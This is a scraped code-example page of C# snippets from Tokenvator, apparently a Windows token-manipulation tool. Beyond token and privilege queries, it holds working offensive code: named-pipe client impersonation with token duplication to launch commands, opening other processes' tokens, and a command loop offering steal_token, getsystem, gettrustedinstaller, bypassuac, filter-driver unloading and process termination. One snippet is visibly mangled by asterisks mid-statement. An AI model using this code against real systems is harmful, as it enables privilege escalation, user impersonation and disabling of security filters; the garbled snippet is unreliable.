コード例 #1
0
        ////////////////////////////////////////////////////////////////////////////////
        // Displays the users associated with a token
        ////////////////////////////////////////////////////////////////////////////////
        public static void GetTokenUser(IntPtr hToken)
        {
            advapi32.GetTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenUser, IntPtr.Zero, 0, out UInt32 returnLength);
            IntPtr lpTokenInformation = Marshal.AllocHGlobal((Int32)returnLength);

            Ntifs._TOKEN_USER tokenUser;
            try
            {
                if (!advapi32.GetTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenUser, lpTokenInformation, returnLength, out returnLength))
                {
                    Tokens.GetWin32Error("GetTokenInformation - Pass 2");
                    return;
                }
                tokenUser = (Ntifs._TOKEN_USER)Marshal.PtrToStructure(lpTokenInformation, typeof(Ntifs._TOKEN_USER));
                if (IntPtr.Zero == tokenUser.User[0].Sid)
                {
                    Tokens.GetWin32Error("PtrToStructure");
                }
            }
            catch (Exception ex)
            {
                Tokens.GetWin32Error("GetTokenInformation - Pass 2");
                Console.WriteLine(ex.Message);
                return;
            }
            finally
            {
                Marshal.FreeHGlobal(lpTokenInformation);
            }

            Console.WriteLine("[+] User: "******"{0,-50} {1}", sid, account);
            return;
        }
コード例 #2
0
        ////////////////////////////////////////////////////////////////////////////////
        //https://blogs.msdn.microsoft.com/cjacks/2006/10/08/how-to-determine-if-a-user-is-a-member-of-the-administrators-group-with-uac-enabled-on-windows-vista/
        ////////////////////////////////////////////////////////////////////////////////
        public static Boolean CheckElevation(IntPtr hToken)
        {
            Int32 output = -1;

            if (!_QueryTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenElevationType, ref output))
            {
                Tokens.GetWin32Error("TokenElevationType");
                return(false);
            }

            switch ((Winnt.TOKEN_ELEVATION_TYPE)output)
            {
            case Winnt.TOKEN_ELEVATION_TYPE.TokenElevationTypeDefault:;
                return(false);

            case Winnt.TOKEN_ELEVATION_TYPE.TokenElevationTypeFull:
                return(true);

            case Winnt.TOKEN_ELEVATION_TYPE.TokenElevationTypeLimited:
                return(false);

            default:
                return(true);
            }
        }
コード例 #3
0
        ////////////////////////////////////////////////////////////////////////////////
        // Private function to query a token with an enumeration result
        ////////////////////////////////////////////////////////////////////////////////
        private static Boolean _QueryTokenInformation(IntPtr hToken, Winnt._TOKEN_INFORMATION_CLASS informationClass, ref Int32 dwTokenInformation)
        {
            UInt32 tokenInformationLength = (UInt32)Marshal.SizeOf(typeof(UInt32));
            IntPtr lpTokenInformation     = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(UInt32)));

            try
            {
                if (!advapi32.GetTokenInformation(hToken, informationClass, lpTokenInformation, tokenInformationLength, out UInt32 returnLength))
                {
                    Tokens.GetWin32Error("GetTokenInformation");
                    return(false);
                }
                dwTokenInformation = Marshal.ReadInt32(lpTokenInformation);
            }
            catch (Exception ex)
            {
                Tokens.GetWin32Error("GetTokenInformation");
                Console.WriteLine("[-] {0}", ex.Message);
                return(false);
            }
            finally
            {
                Marshal.FreeHGlobal(lpTokenInformation);
            }
            return(true);
        }
コード例 #4
0
        ////////////////////////////////////////////////////////////////////////////////
        // Lists the groups associated with a token
        ////////////////////////////////////////////////////////////////////////////////
        public static Boolean GetTokenGroups(IntPtr hToken)
        {
            advapi32.GetTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenGroups, IntPtr.Zero, 0, out UInt32 returnLength);
            IntPtr lpTokenInformation = Marshal.AllocHGlobal((Int32)returnLength);

            Ntifs._TOKEN_GROUPS tokenGroups;
            try
            {
                if (!advapi32.GetTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenGroups, lpTokenInformation, returnLength, out returnLength))
                {
                    Tokens.GetWin32Error("GetTokenInformation - Pass 2");
                    return(false);
                }
                tokenGroups = (Ntifs._TOKEN_GROUPS)Marshal.PtrToStructure(lpTokenInformation, typeof(Ntifs._TOKEN_GROUPS));
            }
            catch (Exception ex)
            {
                Tokens.GetWin32Error("GetTokenInformation - Pass 2");
                Console.WriteLine(ex.Message);
                return(false);
            }
            finally
            {
                Marshal.FreeHGlobal(lpTokenInformation);
            }

            Console.WriteLine("[+] Enumerated {0} Groups: ", tokenGroups.GroupCount);
            for (Int32 i = 0; i < tokenGroups.GroupCount; i++)
            {
                _ReadSidAndName(tokenGroups.Groups[i].Sid, out String sid, out String account);
                Console.WriteLine("{0,-50} {1}", sid, account);
            }
            return(true);
        }
コード例 #5
0
        ////////////////////////////////////////////////////////////////////////////////
        //https://blogs.msdn.microsoft.com/cjacks/2006/10/08/how-to-determine-if-a-user-is-a-member-of-the-administrators-group-with-uac-enabled-on-windows-vista/
        ////////////////////////////////////////////////////////////////////////////////
        public static Boolean GetElevationType(IntPtr hToken, out Winnt._TOKEN_TYPE tokenType)
        {
            Int32 output = -1;

            if (!_QueryTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenType, ref output))
            {
                Tokens.GetWin32Error("TokenType");
                tokenType = 0;
                return(false);
            }

            switch ((Winnt._TOKEN_TYPE)output)
            {
            case Winnt._TOKEN_TYPE.TokenPrimary:
                Console.WriteLine("[+] Primary Token");
                tokenType = Winnt._TOKEN_TYPE.TokenPrimary;
                return(true);

            case Winnt._TOKEN_TYPE.TokenImpersonation:
                tokenType = Winnt._TOKEN_TYPE.TokenImpersonation;
                if (!_QueryTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenImpersonationLevel, ref output))
                {
                    return(false);
                }
                switch ((Winnt._SECURITY_IMPERSONATION_LEVEL)output)
                {
                case Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityAnonymous:
                    Console.WriteLine("[+] Anonymous Token");
                    return(true);

                case Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityIdentification:
                    Console.WriteLine("[+] Identification Token");
                    return(true);

                case Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation:
                    Console.WriteLine("[+] Impersonation Token");
                    return(true);

                case Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityDelegation:
                    Console.WriteLine("[+] Delegation Token");
                    return(true);

                default:
                    Console.WriteLine("[-] Unknown Impersionation Type");
                    return(false);
                }

            default:
                Console.WriteLine("[-] Unknown Type {0}", output);
                tokenType = 0;
                return(false);
            }
        }
コード例 #6
0
        ////////////////////////////////////////////////////////////////////////////////
        // Wrapper for CreateProcessWithTokenW
        ////////////////////////////////////////////////////////////////////////////////
        public static Boolean CreateProcessWithTokenW(IntPtr phNewToken, String name, String arguments)
        {
            if (name.Contains(@"\"))
            {
                name = System.IO.Path.GetFullPath(name);
                if (!System.IO.File.Exists(name))
                {
                    Console.WriteLine("[-] File Not Found");
                    return(false);
                }
            }
            else
            {
                name = FindFilePath(name);
                if (String.Empty == name)
                {
                    Console.WriteLine("[-] Unable to find file");
                    return(false);
                }
            }

            Console.WriteLine("[*] CreateProcessWithTokenW");
            Winbase._STARTUPINFO startupInfo = new Winbase._STARTUPINFO
            {
                cb = (UInt32)Marshal.SizeOf(typeof(Winbase._STARTUPINFO))
            };
            Winbase._PROCESS_INFORMATION processInformation = new Winbase._PROCESS_INFORMATION();
            if (!advapi32.CreateProcessWithTokenW(
                    phNewToken,
                    Winbase.LOGON_FLAGS.LOGON_NETCREDENTIALS_ONLY,
                    name,
                    name + " " + arguments,
                    Winbase.CREATION_FLAGS.NONE,
                    IntPtr.Zero,
                    Environment.CurrentDirectory,
                    ref startupInfo,
                    out processInformation
                    ))
            {
                Tokens.GetWin32Error("CreateProcessWithTokenW");
                return(false);
            }
            Console.WriteLine(" [+] Created process: " + processInformation.dwProcessId);
            Console.WriteLine(" [+] Created thread: " + processInformation.dwThreadId);
            return(true);
        }
コード例 #7
0
        ////////////////////////////////////////////////////////////////////////////////
        ////////////////////////////////////////////////////////////////////////////////
        public static void GetPipeToken(String pipeName, String command)
        {
            Console.WriteLine("[*] Creating Listener Thread");
            Thread thread = new Thread(() => _GetPipeToken(pipeName));

            thread.Start();
            waitHandle.WaitOne();

            Console.WriteLine("[*] Joining Thread");
            thread.Join();
            Console.WriteLine("[*] Joined Thread");

            if (IntPtr.Zero != hToken)
            {
                Console.WriteLine("[*] CreateProcessWithLogonW");
                Winbase._STARTUPINFO startupInfo = new Winbase._STARTUPINFO();
                startupInfo.cb = (UInt32)Marshal.SizeOf(typeof(Winbase._STARTUPINFO));
                Winbase._PROCESS_INFORMATION processInformation = new Winbase._PROCESS_INFORMATION();
                if (!advapi32.CreateProcessWithLogonW(
                        "i", "j", "k",
                        Winbase.LOGON_FLAGS.LOGON_NETCREDENTIALS_ONLY,
                        command, command,
                        Winbase.CREATION_FLAGS.CREATE_DEFAULT_ERROR_MODE,
                        IntPtr.Zero,
                        Environment.CurrentDirectory,
                        ref startupInfo,
                        out processInformation
                        ))
                {
                    Tokens.GetWin32Error("CreateProcessWithLogonW");
                }
                else
                {
                    Console.WriteLine(" [+] Created process: {0}", processInformation.dwProcessId);
                    Console.WriteLine(" [+] Created thread:  {1}", processInformation.dwThreadId);
                }
                kernel32.CloseHandle(hToken);
                hToken = IntPtr.Zero;
            }
        }
コード例 #8
0
ファイル: Program.cs プロジェクト: slooppe/Tokenvator
        ////////////////////////////////////////////////////////////////////////////////
        // Open Process and a process token
        ////////////////////////////////////////////////////////////////////////////////
        private static Boolean OpenToken(Int32 processID, ref IntPtr hToken)
        {
            IntPtr hProcess = kernel32.OpenProcess(Constants.PROCESS_QUERY_INFORMATION, false, (UInt32)processID);

            if (IntPtr.Zero == hProcess)
            {
                Tokens.GetWin32Error("OpenProcess");
                return(false);
            }
            Console.WriteLine("[*] Recieved Process Handle 0x{0}", hProcess.ToString("X4"));
            if (!kernel32.OpenProcessToken(hProcess, Constants.TOKEN_ALL_ACCESS, out hToken))
            {
                if (!kernel32.OpenProcessToken(hProcess, (UInt32)Winnt.ACCESS_MASK.MAXIMUM_ALLOWED, out hToken))
                {
                    Tokens.GetWin32Error("OpenProcessToken");
                    return(false);
                }
            }
            Console.WriteLine("[*] Recieved Token Handle 0x{0}", hToken.ToString("X4"));
            kernel32.CloseHandle(hProcess);
            return(true);
        }
コード例 #9
0
        ////////////////////////////////////////////////////////////////////////////////
        //https://blogs.msdn.microsoft.com/cjacks/2006/10/08/how-to-determine-if-a-user-is-a-member-of-the-administrators-group-with-uac-enabled-on-windows-vista/
        ////////////////////////////////////////////////////////////////////////////////
        public static Boolean PrintElevation(IntPtr hToken)
        {
            Int32 output = -1;

            if (!_QueryTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenElevationType, ref output))
            {
                Tokens.GetWin32Error("TokenElevationType");
                return(false);
            }

            switch ((Winnt.TOKEN_ELEVATION_TYPE)output)
            {
            case Winnt.TOKEN_ELEVATION_TYPE.TokenElevationTypeDefault:
                Console.WriteLine("[+] TokenElevationTypeDefault");
                Console.WriteLine("[*] Token: Not Split");
                //Console.WriteLine("ProcessIntegrity: Medium/Low");
                return(false);

            case Winnt.TOKEN_ELEVATION_TYPE.TokenElevationTypeFull:
                Console.WriteLine("[+] TokenElevationTypeFull");
                Console.WriteLine("[*] Token: Split");
                Console.WriteLine("[+] ProcessIntegrity: High");
                return(true);

            case Winnt.TOKEN_ELEVATION_TYPE.TokenElevationTypeLimited:
                Console.WriteLine("[-] TokenElevationTypeLimited");
                Console.WriteLine("[*] Token: Split");
                Console.WriteLine("[-] ProcessIntegrity: Medium/Low");
                Console.WriteLine("[!] Hint: Try to Bypass UAC");
                return(false);

            default:
                Console.WriteLine("[-] Unknown integrity {0}", output);
                Console.WriteLine("[!] Trying anyway");
                return(true);
            }
        }
コード例 #10
0
        ////////////////////////////////////////////////////////////////////////////////
        // Checks if a Privilege Exists and is Enabled
        ////////////////////////////////////////////////////////////////////////////////
        public static Boolean CheckTokenPrivilege(IntPtr hToken, String privilegeName, out Boolean exists, out Boolean enabled)
        {
            exists  = false;
            enabled = false;
            ////////////////////////////////////////////////////////////////////////////////
            advapi32.GetTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenPrivileges, IntPtr.Zero, 0, out UInt32 TokenInfLength);
            if (TokenInfLength <= 0 || TokenInfLength > Int32.MaxValue)
            {
                Tokens.GetWin32Error("GetTokenInformation - 1 " + TokenInfLength);
                return(false);
            }
            IntPtr lpTokenInformation = Marshal.AllocHGlobal((Int32)TokenInfLength);

            ////////////////////////////////////////////////////////////////////////////////
            if (!advapi32.GetTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenPrivileges, lpTokenInformation, TokenInfLength, out TokenInfLength))
            {
                Tokens.GetWin32Error("GetTokenInformation - 2 " + TokenInfLength);
                return(false);
            }
            Winnt._TOKEN_PRIVILEGES_ARRAY tokenPrivileges = (Winnt._TOKEN_PRIVILEGES_ARRAY)Marshal.PtrToStructure(lpTokenInformation, typeof(Winnt._TOKEN_PRIVILEGES_ARRAY));
            Marshal.FreeHGlobal(lpTokenInformation);

            ////////////////////////////////////////////////////////////////////////////////
            for (Int32 i = 0; i < tokenPrivileges.PrivilegeCount; i++)
            {
                System.Text.StringBuilder lpName = new System.Text.StringBuilder();
                Int32  cchName = 0;
                IntPtr lpLuid  = Marshal.AllocHGlobal(Marshal.SizeOf(tokenPrivileges.Privileges[i]));
                Marshal.StructureToPtr(tokenPrivileges.Privileges[i].Luid, lpLuid, true);
                try
                {
                    advapi32.LookupPrivilegeName(null, lpLuid, null, ref cchName);
                    if (cchName <= 0 || cchName > Int32.MaxValue)
                    {
                        Tokens.GetWin32Error("LookupPrivilegeName Pass 1");
                        continue;
                    }

                    lpName.EnsureCapacity(cchName + 1);
                    if (!advapi32.LookupPrivilegeName(null, lpLuid, lpName, ref cchName))
                    {
                        Tokens.GetWin32Error("LookupPrivilegeName Pass 2");
                        continue;
                    }

                    if (lpName.ToString() != privilegeName)
                    {
                        continue;
                    }
                    exists = true;

                    Winnt._PRIVILEGE_SET privilegeSet = new Winnt._PRIVILEGE_SET
                    {
                        PrivilegeCount = 1,
                        Control        = Winnt.PRIVILEGE_SET_ALL_NECESSARY,
                        Privilege      = new Winnt._LUID_AND_ATTRIBUTES[] { tokenPrivileges.Privileges[i] }
                    };
                    if (!advapi32.PrivilegeCheck(hToken, privilegeSet, out IntPtr pfResult))
                    {
                        Tokens.GetWin32Error("PrivilegeCheck");
                        continue;
                    }
                    enabled = Convert.ToBoolean(pfResult.ToInt32());
                }
                catch (Exception ex)
                {
                    Console.WriteLine(ex.Message);
                    return(false);
                }
                finally
                {
                    Marshal.FreeHGlobal(lpLuid);
                }
            }
            Console.WriteLine();
            return(false);
        }
コード例 #11
0
        ////////////////////////////////////////////////////////////////////////////////
        ////////////////////////////////////////////////////////////////////////////////
        private static Boolean _GetPipeToken(String pipeName)
        {
            IntPtr hNamedPipe = IntPtr.Zero;

            try
            {
                hNamedPipe = kernel32.CreateNamedPipeA(pipeName, Winbase.OPEN_MODE.PIPE_ACCESS_DUPLEX, Winbase.PIPE_MODE.PIPE_TYPE_MESSAGE | Winbase.PIPE_MODE.PIPE_WAIT, 2, 0, 0, 0, IntPtr.Zero);
                if (IntPtr.Zero == hNamedPipe)
                {
                    Tokens.GetWin32Error("CreateNamedPipeA");
                    return(false);
                }
                Console.WriteLine("[+] Created Pipe {0}", pipeName);
                waitHandle.Set();

                if (!kernel32.ConnectNamedPipe(hNamedPipe, IntPtr.Zero))
                {
                    Tokens.GetWin32Error("ConnectNamedPipe");
                    return(false);
                }
                Console.WriteLine("[+] Connected to Pipe {0}", pipeName);


                Byte[] lpBuffer            = new Byte[128];
                UInt32 lpNumberOfBytesRead = 0;
                if (!kernel32.ReadFile(hNamedPipe, lpBuffer, 1, ref lpNumberOfBytesRead, IntPtr.Zero))
                {
                    Tokens.GetWin32Error("ReadFile");
                    return(false);
                }

                Console.WriteLine("[+] Read Pipe {0}", pipeName);

                if (!advapi32.ImpersonateNamedPipeClient(hNamedPipe))
                {
                    Tokens.GetWin32Error("ImpersonateNamedPipeClient");
                    return(false);
                }
                Console.WriteLine("[+] Impersonated Pipe {0}", pipeName);

                Winbase._SECURITY_ATTRIBUTES sa = new Winbase._SECURITY_ATTRIBUTES();
                sa.bInheritHandle       = false;
                sa.nLength              = (UInt32)Marshal.SizeOf(sa);
                sa.lpSecurityDescriptor = (IntPtr)0;


                if (!kernel32.OpenThreadToken(kernel32.GetCurrentThread(), Constants.TOKEN_ALL_ACCESS, false, ref hToken))
                {
                    Tokens.GetWin32Error("OpenThreadToken");
                    return(false);
                }
                Console.WriteLine("[+] Thread Token 0x{0}", hToken.ToString("X4"));

                IntPtr phNewToken = new IntPtr();
                UInt32 result     = ntdll.NtDuplicateToken(hToken, Constants.TOKEN_ALL_ACCESS, IntPtr.Zero, true, Winnt._TOKEN_TYPE.TokenPrimary, ref phNewToken);
                if (IntPtr.Zero == phNewToken)
                {
                    result = ntdll.NtDuplicateToken(hToken, Constants.TOKEN_ALL_ACCESS, IntPtr.Zero, true, Winnt._TOKEN_TYPE.TokenImpersonation, ref phNewToken);
                    if (IntPtr.Zero == phNewToken)
                    {
                        Tokens.GetNtError("NtDuplicateToken", result);
                        return(false);
                    }
                }

                if (IntPtr.Zero != phNewToken)
                {
                    hToken = phNewToken;
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine("[-] {0}", ex.Message);
                return(false);
            }
            finally
            {
                if (IntPtr.Zero != hNamedPipe)
                {
                    kernel32.DisconnectNamedPipe(hNamedPipe);
                    kernel32.CloseHandle(hNamedPipe);
                }
            }

            return(true);
        }
コード例 #12
0
ファイル: Program.cs プロジェクト: slooppe/Tokenvator
        internal void Run()
        {
            try
            {
                Console.Write(context);
                String input;
                if (activateTabs)
                {
                    input = console.ReadLine();
                }
                else
                {
                    input = Console.ReadLine();
                }

                IntPtr tempToken = IntPtr.Zero;
                kernel32.OpenProcessToken(kernel32.GetCurrentProcess(), Constants.TOKEN_ALL_ACCESS, out IntPtr hToken);
                switch (NextItem(ref input))
                {
                case "info":
                    if (GetProcessID(input, out processID, out command) && OpenToken(processID, ref tempToken))
                    {
                        hToken = tempToken;
                    }
                    Console.WriteLine("");
                    CheckPrivileges.GetTokenUser(hToken);
                    Console.WriteLine("");
                    CheckPrivileges.GetTokenOwner(hToken);
                    Console.WriteLine("");
                    CheckPrivileges.GetTokenGroups(hToken);
                    Console.WriteLine("");
                    CheckPrivileges.GetElevationType(hToken, out Winnt._TOKEN_TYPE tokenType);
                    CheckPrivileges.PrintElevation(hToken);
                    break;

                case "list_privileges":
                    if (GetProcessID(input, out processID, out command))
                    {
                        if (OpenToken(processID, ref tempToken))
                        {
                            hToken = tempToken;
                        }
                        else
                        {
                            break;
                        }
                    }
                    Tokens.EnumerateTokenPrivileges(hToken);
                    break;

                case "enable_privilege":
                    if (GetProcessID(input, out processID, out command))
                    {
                        if (OpenToken(processID, ref tempToken))
                        {
                            hToken = tempToken;
                        }
                        else
                        {
                            break;
                        }
                    }
                    Tokens.SetTokenPrivilege(ref hToken, command, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED);
                    break;

                case "disable_privilege":
                    if (GetProcessID(input, out processID, out command))
                    {
                        if (OpenToken(processID, ref tempToken))
                        {
                            hToken = tempToken;
                        }
                        else
                        {
                            break;
                        }
                    }
                    Tokens.SetTokenPrivilege(ref hToken, command, Winnt.TokenPrivileges.SE_PRIVILEGE_NONE);
                    break;

                case "remove_privilege":
                    if (GetProcessID(input, out processID, out command))
                    {
                        if (OpenToken(processID, ref tempToken))
                        {
                            hToken = tempToken;
                        }
                        else
                        {
                            break;
                        }
                    }
                    Tokens.SetTokenPrivilege(ref hToken, command, Winnt.TokenPrivileges.SE_PRIVILEGE_REMOVED);
                    break;

                case "nuke_privileges":
                    if (GetProcessID(input, out processID, out command))
                    {
                        if (OpenToken(processID, ref tempToken))
                        {
                            hToken = tempToken;
                        }
                        else
                        {
                            break;
                        }
                    }
                    Tokens.DisableAndRemoveAllTokenPrivileges(ref hToken);
                    break;

                case "terminate":
                    if (GetProcessID(input, out processID, out command))
                    {
                        IntPtr hProcess = kernel32.OpenProcess(Constants.PROCESS_TERMINATE, false, (UInt32)processID);
                        if (IntPtr.Zero == hProcess)
                        {
                            Tokens.GetWin32Error("OpenProcess");
                            break;
                        }
                        Console.WriteLine("[*] Recieved Process Handle 0x{0}", hProcess.ToString("X4"));
                        if (!kernel32.TerminateProcess(hProcess, 0))
                        {
                            Tokens.GetWin32Error("TerminateProcess");
                            break;
                        }
                        Console.WriteLine("[+] Process Terminated");
                    }
                    break;

                case "sample_processes":
                    users = Enumeration.EnumerateTokens(false);
                    Console.WriteLine("{0,-40}{1,-20}{2}", "User", "Process ID", "Process Name");
                    Console.WriteLine("{0,-40}{1,-20}{2}", "----", "----------", "------------");
                    foreach (String name in users.Keys)
                    {
                        Console.WriteLine("{0,-40}{1,-20}{2}", name, users[name], Process.GetProcessById((Int32)users[name]).ProcessName);
                    }
                    break;

                case "sample_processes_wmi":
                    users = Enumeration.EnumerateTokensWMI();
                    Console.WriteLine("{0,-40}{1,-20}{2}", "User", "Process ID", "Process Name");
                    Console.WriteLine("{0,-40}{1,-20}{2}", "----", "----------", "------------");
                    foreach (String name in users.Keys)
                    {
                        Console.WriteLine("{0,-40}{1,-20}{2}", name, users[name], Process.GetProcessById((Int32)users[name]).ProcessName);
                    }
                    break;

                case "find_user_processes":
                    processes = Enumeration.EnumerateUserProcesses(false, input);
                    Console.WriteLine("{0,-30}{1,-30}", "Process ID", "Process Name");
                    Console.WriteLine("{0,-30}{1,-30}", "----------", "------------");
                    foreach (UInt32 pid in processes.Keys)
                    {
                        Console.WriteLine("{0,-30}{1,-30}", pid, processes[pid]);
                    }
                    break;

                case "find_user_processes_wmi":
                    processes = Enumeration.EnumerateUserProcessesWMI(input);
                    Console.WriteLine("{0,-30}{1,-30}", "Process ID", "Process Name");
                    Console.WriteLine("{0,-30}{1,-30}", "----------", "------------");
                    foreach (UInt32 pid in processes.Keys)
                    {
                        Console.WriteLine("{0,-30}{1,-30}", pid, processes[pid]);
                    }
                    break;

                case "list_filters":
                    using (Filters filters = new Filters())
                    {
                        filters.First();
                        filters.Next();
                    }
                    break;

                case "list_filter_instances":
                    using (FilterInstance filterInstance = new FilterInstance(NextItem(ref input)))
                    {
                        filterInstance.First();
                        filterInstance.Next();
                    }
                    break;

                case "detach_filter":
                    Filters.FilterDetach(input);
                    break;

                case "unload_filter":
                    Filters.Unload(NextItem(ref input));
                    break;

                case "sessions":
                    Enumeration.EnumerateInteractiveUserSessions();
                    break;

                case "getsystem":
                    GetSystem(input, hToken);
                    break;

                case "gettrustedinstaller":
                    GetTrustedInstaller(input);
                    break;

                case "steal_token":
                    StealToken(input);
                    break;

                case "steal_pipe_token":
                    StealPipeToken(input);
                    break;

                case "bypassuac":
                    BypassUAC(input);
                    break;

                case "whoami":
                    Console.WriteLine("[*] Operating as {0}", WindowsIdentity.GetCurrent().Name);
                    break;

                case "reverttoself":
                    String message = advapi32.RevertToSelf() ? "[*] Reverted token to " + WindowsIdentity.GetCurrent().Name : "[-] RevertToSelf failed";
                    Console.WriteLine(message);
                    break;

                case "run":
                    Run(input);
                    break;

                case "runpowershell":
                    RunPowerShell(input);
                    break;

                case "exit":
                    Environment.Exit(0);
                    break;

                case "help":
                    String item = NextItem(ref input);
                    if ("help" != item)
                    {
                        Help(item);
                    }
                    else
                    {
                        Help();
                    }
                    break;

                default:
                    Help();
                    break;
                }
                if (IntPtr.Zero != hToken)
                {
                    kernel32.CloseHandle(hToken);
                }
                Console.WriteLine();
            }
            catch (Exception error)
            {
                Console.WriteLine(error.ToString());
                Tokens.GetWin32Error("MainLoop");
            }
            finally
            {
            }
        }